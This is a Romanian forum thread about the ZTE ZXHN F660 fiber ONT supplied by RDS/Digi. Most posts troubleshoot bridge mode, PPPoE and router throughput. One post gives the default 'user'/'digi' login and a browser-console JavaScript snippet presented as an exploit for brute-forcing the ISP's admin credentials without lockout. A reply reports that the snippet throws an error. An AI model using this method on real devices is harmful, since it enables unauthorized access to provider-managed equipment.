Jump to content

SUBIECTE NOI
« 1 / 5 »
RSS
Vanzare cumparare fara transfer b...

Receptie ciudata, in functie de t...

Dupa 20 ani de facultate, am uita...

Mobile.de ofera imprumut de bani ...
 problema test grila

Digi24 a disparut de pe TV Lg

Drept de proprietate intelectuala...

Jante noi shitbox
 Trinitas TV 4K

Dacia 1316 cu 6 usi ...

Frecventa modificata radio

Un nou pericol pt batrani
 Ar trebuii sa vindem imobiliarele...

Dupa renuntarea la aparat dentar

pelerinaj in Balcik

Noul format Jpegli iși propu...
 

Router wireless de la digi ZTE ZXHN F660

- - - - -
  • Please log in to reply
1037 replies to this topic

#937
BogzaG

BogzaG

    nu pot trăi fără multiculti

  • Grup: Senior Members
  • Posts: 2,357
  • Înscris: 03.07.2016
wifi-ul lui nu bate foarte departe si nu e foarte bun.

#938
DeuxEx

DeuxEx

    Dark Matter

  • Grup: Senior Members
  • Posts: 4,181
  • Înscris: 11.11.2007
Stie cineva daca cutiile astea de conserve de la RDS  se pot shimba cu ceva mai bun si, daca da, cu ce anume? Si care este procedura?

#939
litza2002ro

litza2002ro

    Junior Member

  • Grup: Members
  • Posts: 55
  • Înscris: 29.05.2012
asta am inteles. pe viitor o sa-mi pun din nou routerul meu TP-Link (dar cred ca e vam complicat), dar totusi, de ce nu merge portul FE? Dupa ce ca are doar 2 iesiri, una nici nu merge

#940
MembruAnonim

MembruAnonim

    MembruAnonim

  • Grup: Banned
  • Posts: 398,284
  • Înscris: 08.10.2015
Portul FE este blocat de catre RDS pentru ca toate abonamentele actuale duc viteze de minim 300 Mbps, in timp ce portul ala duce abia 100 Mbps. Pentru a beneficia de capacitatea maxima permisa de retea trebuie sa folositi portul gigabit (GE).

#941
litza2002ro

litza2002ro

    Junior Member

  • Grup: Members
  • Posts: 55
  • Înscris: 29.05.2012
Adica am o singura iesire? ii sun sa vina sa-si ia cutia inapoi. aberant. in ziua de azi sa faci un router cu o singura iesire.Posted Image . Daca pun peste el routerul meu cel vechi TP-link, ce setari trebuie facute? Merge?

#942
MembruAnonim

MembruAnonim

    MembruAnonim

  • Grup: Banned
  • Posts: 398,284
  • Înscris: 08.10.2015
Cel mai bine este cu router personal si ONT-ul sa fie in bridge.

Merge, suni la ei sa ti-l puna in bridge si apoi iti conectezi routerul tau, in el faci setarile pentru PPPoE si gata.

#943
baribalu

baribalu

    Senior Member

  • Grup: Senior Members
  • Posts: 6,670
  • Înscris: 23.10.2006
Sau mai adaugi un switch Gb dupa router.

#944
mariustm32

mariustm32

    Member

  • Grup: Members
  • Posts: 566
  • Înscris: 10.11.2015
Am si eu o problema care as vrea sa ii gasesc rezolvarea. Am avut net prin cablu si acum cei de la RDS au venit si au bagat fibra optica ( ceva nou pentru mine ). Ideea e ca au venit, au inlocuit infrastructura, au montat ce au avut de montat si au plecat. Bun, am ajuns acasa de la serviciu...am gasit totul montat si ei plecati. \Din cate vad legaturile stau in felul urmator....fibra optica bagata in aparatul de TV, de acolo plecat in ONT-ul ala si din ontul ala un cablu de retea care este conectat la vechiul rooter TPLINK. Wireless-ul merge prin vechiul rooter, Ideea este ca vreau sa ma conectez wireless direct la ONT-ul ala sau cum so numii. Cand dau sa ma conectez, bag parola la wireless si nu se conecteaza. Imi apare acolo langa ceas semnalul wireless cu semnul exclamarii galben. Am incercat ca pe vechiul rooter sa intru pe vreo interfata ceva http://192.168.1.1, dar nici o sansa. Nu imi merge nimic...doar daca e conectat vechiul rooter. Ce pot face sa renunt la vechiul rooter ? Multumesc anticipat !

Modelul este ZXHN F660 RV1

Edited by mariustm32, 26 April 2017 - 17:58.


#945
YAESU

YAESU

    New Member

  • Grup: Members
  • Posts: 12
  • Înscris: 29.04.2008
Salut!
Am un GPON ONT F660  trecut in mod bridge . Dupa el am un router D-LINK DIR825. Problema care apare este ca downloadul si uploadul pe serverele de speed test (RDS Bucuresti si Iasi) nu depaseste 240 Mbps pe down si 260 Mbps pe upload. Am incercat diferite firmware numai de la D-link (nu am testat DDWRT etc), setat routerul si cu wan speed pe auto si pe 1000 MBbs, am dezactivat qos, port forward facut, firewall settings to Endpoint Independent for TCP and UDP... etc etc Totul ok pana aici, numai ca acest router parca nu ar fi gigabit. Limiteaza viteza conectat dupa GPON F660.
Daca ma conectez direct in F660 viteza este ok, dar prin router viteza este limitata. Cabluri folosite cat5e, urmeaza sa primesc si cat6.
Un sfat va rog, sa mai incerc ceva ?

#946
YAESU

YAESU

    New Member

  • Grup: Members
  • Posts: 12
  • Înscris: 29.04.2008
@mariustm32, te poti conecta numai la vechiul router, inseamna ca gpon-ul ont f660 este in mod bridge (setare pe care o face numai RDS), mod in care gponul nu este folosit si cu functia de wirelles, din acest motiv nu poti vedea si interfata gpon-ului. Daca scoti cablul de duce la computer si il bagi in portul in care a fost cablul de ducea la router, te poti conecta pe direct la gpon cu computerul, dar sa ai setarile pppoe in computer.(si poti vedea si interfata gpon, user si digi parola, admin nu ai acces) Ca sa renunti la vechiul router ceri acest lucru si se rezolva rapid de RDS.  Este exact ce am facut eu dar invers, foloseam gpon-ul ca router, am cerut sa-l trec in mod bridge (exact ce ai acum ) si folosesc numai routerul meu si ca wirreles si ca LAN. Trebuia sa le specifici ca nu mai vrei routerul tau si era simplu, dar nu e bai, se rezolva. Deci daca este gpon-ul in mod bridge functia de router nu o mai face, wirelles nu mai face, este ca un "adaptor" intre fibra si cablu.

#947
diZy

diZy

    Senior Member

  • Grup: Senior Members
  • Posts: 6,603
  • Înscris: 12.06.2006
@mariustm32 Ia legatura cu ei si vezi daca ai ont-ul pus in bridge. Daca da sa il faca router.
@ YAESU Arunca gunoiul ala vechi de D-link trebuie alt router nou pt ca D-link-ul ala nu are hardware nat sau foloseste pe cel de la Digi.

Edited by diZy, 26 April 2017 - 18:47.


#948
YAESU

YAESU

    New Member

  • Grup: Members
  • Posts: 12
  • Înscris: 29.04.2008
@diZy cred ca aveti dreptate dar am fost indus in eroare de acest lucru: http://www.rcs-rds.r...t-digi-net/ipv6

Pentru conectare direct de pe PC, sistemul dumneavoastra de operare trebuie sa suporte PPPoE/v6. Versiunile curente ale sistemelor de operare Microsoft Windows, Mac OS x, precum si majoritatea distributiilor Linux suporta implicit PPPoE/v6.

Pentru conectare prin router, routerul dumneavoastra trebuie sa suporte PPPoE/v6 si DHCPv6 Prefix Delegation (RFC 3769). Iata o lista de routere cu suport oficial IPv6 si care au fost testate in prealabil in laboratoarele RCS & RDS:
  • - Linksys E1500 (firmware 1.0.02)
  • - Linksys E2500 (firmware 1.0.03)
  • - Linksys E4200 (firmware 1.0.03)
  • - Draytek Vigor 2130n (firmware 1.5.1.1)
  • - D-Link DIR-825 (firmware 2.05EU)
  • - Cisco 800 Series (IOS 12.4)
  • - Juniper NetScreen SSG5 (ScreenOS 6.2)
Am crezut ca este un "oldie but goldie" acest DIR 825, dar cred ca fost testat in laboratoarele RDS pe timpul cand nu exista "gigabit-ul" plus ca si in datele tehnice scrie ca suporta pe wan si pe lan gigabit. Poate gresesc undeva, dar D-LINK DIR825 nu vrea mai mult de 240 pe down si 260 pe up, conectat dupa F660. Nu invinuiesc pe nimeni, sunt multumit de serviciile RDS, dar scula asta de DIR825 nu o fi capabila pt. vitezele de azi.

#949
valy277

valy277

    Active Member

  • Grup: Members
  • Posts: 1,231
  • Înscris: 04.01.2013

 YAESU, on 26 aprilie 2017 - 19:27, said:

@diZy cred ca aveti dreptate dar am fost indus in eroare de acest lucru: http://www.rcs-rds.r...t-digi-net/ipv6

Pentru conectare direct de pe PC, sistemul dumneavoastra de operare trebuie sa suporte PPPoE/v6. Versiunile curente ale sistemelor de operare Microsoft Windows, Mac OS x, precum si majoritatea distributiilor Linux suporta implicit PPPoE/v6.

Pentru conectare prin router, routerul dumneavoastra trebuie sa suporte PPPoE/v6 si DHCPv6 Prefix Delegation (RFC 3769). Iata o lista de routere cu suport oficial IPv6 si care au fost testate in prealabil in laboratoarele RCS & RDS:
  • - Linksys E1500 (firmware 1.0.02)
  • - Linksys E2500 (firmware 1.0.03)
  • - Linksys E4200 (firmware 1.0.03)
  • - Draytek Vigor 2130n (firmware 1.5.1.1)
  • - D-Link DIR-825 (firmware 2.05EU)
  • - Cisco 800 Series (IOS 12.4)
  • - Juniper NetScreen SSG5 (ScreenOS 6.2)
Am crezut ca este un "oldie but goldie" acest DIR 825, dar cred ca fost testat in laboratoarele RDS pe timpul cand nu exista "gigabit-ul" plus ca si in datele tehnice scrie ca suporta pe wan si pe lan gigabit. Poate gresesc undeva, dar D-LINK DIR825 nu vrea mai mult de 240 pe down si 260 pe up, conectat dupa F660. Nu invinuiesc pe nimeni, sunt multumit de serviciile RDS, dar scula asta de DIR825 nu o fi capabila pt. vitezele de azi.
Păi acest router nu are accelerare hardware!(hardware nat)și nu ai cum să atingi viteze nici de 300 mbps măcar!

Edited by valy277, 26 April 2017 - 20:17.


#950
YAESU

YAESU

    New Member

  • Grup: Members
  • Posts: 12
  • Înscris: 29.04.2008
Multumesc, am inteles acum.
Multe routere au gigabit Ethernet ports, WAN si LAN,  dar asta nu înseamnă că suporta full 1 gigabit prin conectarea la Internet în rețeaua internă, WAN (“internet”) to LAN (“internal network”).
L-am testat LAN to LAN...aici suporta full gigabit.

#951
mariustm32

mariustm32

    Member

  • Grup: Members
  • Posts: 566
  • Înscris: 10.11.2015

 diZy, on 26 aprilie 2017 - 18:46, said:

@mariustm32 Ia legatura cu ei si vezi daca ai ont-ul pus in bridge. Daca da sa il faca router.
@ YAESU Arunca gunoiul ala vechi de D-link trebuie alt router nou pt ca D-link-ul ala nu are hardware nat sau foloseste pe cel de la Digi.
Am sunat la ei, spun ca mai trebuie sa imi dea "nu stiu ce date" si ca o facut o cerere sa urgenteze chestia asta....ce, nu stiu ! Oricum va multumesc pentru raspunsuri si astept "telefonul" de la ei sa-mi furnizeze "nu stiu ce" Posted Image Precizez ca acum este prin fibra optica doar ca merge tot pe userul si parola veche ( adica aceiasi viteza de internet ca inainte )

Edited by mariustm32, 27 April 2017 - 16:56.


#952
kelluxu

kelluxu

    New Member

  • Grup: Junior Members
  • Posts: 1
  • Înscris: 27.04.2017
Postez pentru cine are timp si chef sa exploateze urmatorul exploit pt F660:

Va logati cu userul "user" (parola default "digi").
Accesati meniul Administration-User Management-WEB User Management.
Inspect element pe input boxul de la username (care este dezactivat) si il activati ca in poza atasata.

[ http://pasteboard.co/WHr6iRV2.png - Pentru incarcare in pagina (embed) Click aici ]

http://pasteboard.co/WHr6iRV2.png

Apoi din consola se pot incerca orice combinatii de user/parola fara ca ONT-ul sa blocheze accesul din cauza introducerii unor credentiale eronate.(Se executa codul in italic.)

getObj("Frm_Username").value = "rdsadmin";
getObj("Frm_OldPassword").value = "rdspassword";
getObj("Frm_Password").value = "rdspassword";
getObj("Frm_CfmPassword").value = "rdspassword";

pageSetValue();
setValue("IF_ACTION", "apply");
DisableALL();
getObj("fSubmit").submit();

Edited by kelluxu, 27 April 2017 - 22:52.


#953
macette

macette

    Active Member

  • Grup: Members
  • Posts: 1,549
  • Înscris: 19.09.2008
getObj("Frm_Username").value = "rdsadmin";
getObj("Frm_OldPassword").value = "rdspassword";
getObj("Frm_Password").value = "rdspassword";
getObj("Frm_CfmPassword").value = "rdspassword";
pageSetValue();
setValue("IF_ACTION", "apply");
DisableALL();
getObj("fSubmit").submit();

TypeError: getObj(...) is null [Learn More]

Edited by macette, 01 May 2017 - 21:40.


#954
perlan

perlan

    Member

  • Grup: Members
  • Posts: 246
  • Înscris: 12.03.2017
Ceva noutati?

Anunturi

Neurochirurgie minim invazivă Neurochirurgie minim invazivă

"Primum non nocere" este ideea ce a deschis drumul medicinei spre minim invaziv.

Avansul tehnologic extraordinar din ultimele decenii a permis dezvoltarea tuturor domeniilor medicinei. Microscopul operator, neuronavigația, tehnicile anestezice avansate permit intervenții chirurgicale tot mai precise, tot mai sigure. Neurochirurgia minim invazivă, sau prin "gaura cheii", oferă pacienților posibilitatea de a se opera cu riscuri minime, fie ele neurologice, infecțioase, medicale sau estetice.

www.neurohope.ro

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

Forumul Softpedia foloseste "cookies" pentru a imbunatati experienta utilizatorilor Accept
Pentru detalii si optiuni legate de cookies si datele personale, consultati Politica de utilizare cookies si Politica de confidentialitate